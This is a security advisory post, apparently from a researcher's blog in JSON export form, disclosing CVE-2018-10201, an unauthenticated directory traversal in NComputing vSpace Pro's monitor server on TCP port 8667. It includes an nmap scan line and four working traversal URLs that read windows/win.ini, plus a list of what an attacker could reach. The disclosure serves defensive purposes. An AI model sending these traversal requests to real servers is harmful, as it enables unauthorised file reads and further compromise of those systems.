{"id":5199,"date":"2018-04-20T01:46:57","date_gmt":"2018-04-20T04:46:57","guid":{"rendered":"https:\/\/www.kwell.net\/kwell_blog\/?p=5199"},"modified":"2018-05-07T21:12:11","modified_gmt":"2018-05-08T00:12:11","slug":"cve-2018-10201-ncomputing-vspace-pro-directory-traversal-vulnerability","status":"publish","type":"post","link":"https:\/\/www.kwell.net\/kwell_blog\/?p=5199","title":{"rendered":"CVE-2018-10201 – Ncomputing vSpace Pro Directory Traversal Vulnerability"},"content":{"rendered":"

CVE-2018-10201<\/span><\/u><\/b><\/p>\n

Ncomputing vSpace Pro Directory Traversal Vulnerability<\/strong><\/p>\n

[Description]<\/p>\n

An issue was discovered in NcMonitorServer.exe in NC Monitor Server in NComputing vSpace Pro 10 and 11.<\/p>\n

It is possible to read arbitrary files outside the root directory of the web server. This vulnerability could be exploited remotely by a crafted URL without credentials, with …\/ or …\\ or ….\/ or ….\\ as a directory-traversal pattern to TCP port 8667.<\/p>\n

An attacker can make use of this vulnerability to step out of the root directory and access other parts of the file system. This might give the attacker the ability to view restricted files, which could provide the attacker with more information required to further compromise the system.<\/p>\n

<\/p>\n

\n

[Additional Information]<\/p>\n

nmap -p T:8667 -Pn your_vSpace_server<\/p>\n

Nmap scan report for your_vSpace_server (x.x.x.x)
\nHost is up (0.044s latency).<\/p>\n

PORT\u00a0\u00a0\u00a0\u00a0 STATE SERVICE
\n8667\/tcp open\u00a0 unknown<\/p>\n

http:\/\/your_vSpace_server:8667\/...\/...\/...\/...\/...\/...\/...\/...\/...\/windows\/win.ini<\/p>\n

http:\/\/your_vSpace_server:8667\/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini<\/p>\n

http:\/\/your_vSpace_server:8667\/....\/....\/....\/....\/....\/....\/....\/....\/....\/windows\/win.ini<\/p>\n

http:\/\/your_vSpace_server:8667\/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini<\/p>\n

\n

[Vulnerability Type]
\nDirectory Traversal<\/p>\n

\n

[Vendor of Product]
\nNComputing<\/p>\n

\n

[Affected Product Code Base]
\nvSpace – Pro 10
\nvSpace – Pro 11<\/p>\n

\n

[Affected Component]
\nNcMonitorServer.exe TCP 8667
\nNC Monitor Server: Health monitoring agents connect to it to provide collected data<\/p>\n

\n

[Attack Type]
\nRemote<\/p>\n

\n

[Impact Information Disclosure]
\nTrue<\/p>\n

\n

[Discoverer]
\nJavier Bernardo – Kwell.net<\/a>
\nemail: javier@kwell.net<\/a><\/p>\n

\n

https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2018-10201<\/a><\/span><\/p>\n

http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-10201<\/a><\/span><\/p>\n

[Attack vectors]<\/p>\n

Unprivileged access to files across all file system could lead to exposure of sensitive data like: password hashes, application hard codes, history files, log files, databases, etc. A malicious user could use this vulnerability to fingerprint operative system, software, hardware, drivers, devices, networks, etc. and also access source code of applications which they can scour for more\u00a0 vulnerabilities. In some situations, an attacker can leverage the file path traversal vulnerability to gain complete control over the server.<\/p>\n

In this example you will see a Proof of Concept Video of the founded vulnerability.<\/p>\n